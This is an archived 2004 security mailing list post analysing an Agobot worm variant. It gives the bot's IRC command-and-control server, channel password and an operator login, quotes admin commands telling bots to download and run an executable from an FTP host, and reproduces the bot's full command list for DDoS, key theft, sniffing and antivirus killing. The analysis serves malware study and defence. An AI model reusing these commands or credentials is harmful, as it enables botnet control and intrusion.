lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: isec at europe.com (Willem Koenings) Subject: Re: Outbreak of a virus on campus ----- Original Message ----- From: "Morning Wood" Date: Sat, 24 Apr 2004 18:37:31 +0000 To: mueller@...net.com, full-disclosure@...ts.netsys.com Subject: RE: [Full-Disclosure] Re: Outbreak of a virus on campus > phatbot? This one is yet another agobot. Has long list of useful commands (included in the end of posting, if someone is interested...), polymorph capability, stealth capability -hides its own process in memory and binary from listing, capable of updating itself via ftp/http, has list of servers for evaluating connection speed, steals cdkeys, sniffs a wire, performs ddos, capable installing a proxy, sends spam via aol, can install identd, has LONG list various processes to kill (mostly AV, but also regedit and tcpview among others), retrievs sysinfo, makes screenshots etc etc etc - looks similar to others good household bot's :) What makes its interesting - its stealth capability and propagation. It has following scanning/propagation subroutines: CScannerBagle CScannerBase CScannerDCOM CScannerDoom CScannerDW CScannerHTTP CScannerNetBios CScannerOptix CScannerSQL CScannerUPNP CScannerWKS When worm is started, it connects to irc server 193.87.20.31 (irc.weednet.net) port 7000. Then it joines to password ptotected channel #1337, password is heyho. As channel topic is .scan.startall, it accepts command and starts right away scanning. I took my trusty irc client and joined to that channel by myself. Right away admin gave me those commands: <admin> .login stebo jamesbond007 -s <admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe %TEMP%\xgf.exeBLAOR12 <admin> .scan.stop <admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe c:\xgf.exe BLAOR12 seems like my 'bot' version was too old :) have fun :) W. ----------------------- commands and parameters all commands starts with . (dot) irc.screencap takes a screenshot of the active desktop irc.server changes the server the bot connects to irc.reconnect reconnects to the server irc.raw sends a raw message to the irc server irc.quit quits the bot irc.privmsg sends a privmsg irc.part makes the bot part a channel irc.netinfo prints netinfo irc.mode lets the bot perform a mode change irc.join makes the bot join a channel irc.gethost.join makes the <host> bot joins channel you want irc.getedu.join makes the .edu bots join channel you want irc.gethost prints netinfo when host matches irc.getedu prints netinfo when the bot is .edu irc.dccsend sends a file over dcc irc.action lets the bot perform an action irc.disconnect disconnects the bot from irc bot.command runs a command with system() bot.unsecure enable shares / enable dcom bot.secure delete shares / disable dcom bot.flushdns flushes the bots dns cache bot.quit bot.highspeed If speed > 5000 then bot will respond bot.longuptime If uptime > 7 days then bot will respond bot.sysinfo displays the system info bot.status gives status bot.rndnick makes the bot generate a new random nick bot.removeallbut removes the bot if id does not match bot.remove removes the bot bot.open opens a file (whatever) bot.nick changes the nickname of the bot bot.id displays the id of the current code bot.execute makes the bot execute a .exe bot.dns resolves ip/hostname by dns bot.die terminates the bot bot.about displays the info the author wants you to see shell.disable Disable shell handler shell.enable Enable shell handler shell.handler FallBack handler for shell commands.list Lists all available commands plugin.unload unloads a plugin (not supported yet) plugin.load loads a plugin cvar.saveconfig saves config to a file cvar.loadconfig loads config from a file cvar.set sets the content of a cvar cvar.get gets the content of a cvar cvar.list prints a list of all cvars inst.svcdel deletes a service from scm inst.svcadd adds a service to scm inst.asdel deletes an autostart entry inst.asadd adds an autostart entry logic.ifram exec command if RAM Total is bigger than specified (RAM) logic.ifdiskfree exec command if free disk space available is bigger than specified (GB) logic.ifcpu exec command if proccesors CPU speed is bigger than specified (MHz) logic.ifedu exec command if bot is an edu logic.ifspeed exec command if speed(via speedtest) is bigger than specified logic.ifuptime exec command if uptime is bigger than specified login logs the user in mac.logout logs the user out delay.minutes delays a command a set amount of minutes ftp.update executes a file from a ftp url ftp.execute updates the bot from a ftp url ftp.download downloads a file from ftp http.command reads command(s) from a specified url http.visit visits an url http.update executes a file from a http url http.execute updates the bot from a http url http.download downloads a file from http HttpCommand.Net HttpCommand file.find finds a file (not added yet) file.list lists contents of a directory file.rmdir deletes a directory file.mkdir creates a directory file.move moves a file file.delete deleted a file rsl.logoff logs the user off rsl.shutdown shuts the computer down rsl.reboot reboots the computer pctrl.killpid kills a pid pctrl.killsvc deletes/stops service pctrl.listsvc lists all services pctrl.kill kills a process pctrl.list lists all processes http.speedtest Speed Test to see how fast the bot. scan.stats displays stats of the scanner scan.stop signal stop to child threads scan.start signal start to child threads scan.stopall disable all Scanners and stop scanning scan.startall enable all Scanners and start scanning scan.disable disables a scanner module scan.enable enables a scanner module scan.resetnetranges resets netranges to the localhost scan.clearnetranges clears all netranges registered with the scanner scan.listnetranges lists all netranges registered with the scanner scan.delnetrange deletes a netrange from the scanner scan.addnetrange adds a netrange to the scanner ddos.stop stops all floods redirect.stop stops all redirects running redirect.socks starts a socks4 proxy harvest.cdkeys makes the bot get a list of cdkeys bot.repeat inst_polymorph Installer - Polymorph on install ? vuln_channel Vuln Daemon Sniffer Channel sniffer_channel Sniffer - Output channel sniffer_enabled Sniffer - Enabled ? spam_aol_enabled AOL Spam - Enabled ? spam_aol_channel AOL Spam - Channel name scaninfo_level Info Level 1(less) - (3)more scaninfo_chan Scanner - Output channel cdkey_windows Return Windows Product Keys on cdkey.get identd_enabled IdentD - Enable the server redir_maxthreads Redirect - Maximum Number of threads ddos_maxthreads DDOS - Maximum Number of threads scan_maxsockets Scanner - Maximum Number of sockets scan_maxthreads Scanner - Maximum Number of threads as_service_name Autostart - Short service name as_service Autostart - Start as service as_enabled Autostart - Enabled as_valname Autostart - Value Name do_stealth Bot - Enable Stealth do_avkill Bot - Enable AV kill do_speedtest Bot - Do speedtest on startup bot_topiccmd Bot - Execute topic commands bot_mutex_name Bot - Mutex name bot_mutex Bot - Create mutex bot_meltserver Bot - Melt the original server file bot_randnick Bot - Random nicks of Letters and Numbers bot_compnick Bot - Use the computer name as a nickname bot_seclogin Bot - Enable login only by channel messages bot_timeout Bot - Timeout for receiving in miliseconds bot_prefix Bot - Command Prefix bot_id Bot - Current ID bot_filename Bot - Runtime Filename bot_version 0.3.0 Bot - Version si_nick Server Info - Nickname si_usessl Server Info - Use SSL ? si_servpass Server Info - Server Password si_server Server Info - Server Address si_port Server Info - Server Port si_nickprefix Server Info - Nickname prefix si_mainchan Server Info - Main Channel si_chanpass Server Info - Channel Password bot_ftrans_port_ftp Bot - File Transfer Port for FTP bot_ftrans_port Bot - File Transfer Port -- ___________________________________________________________ Sign-up for Ads Free at Mail.com http://promo.mail.com/adsfreejump.htm
Powered by blists - more mailing lists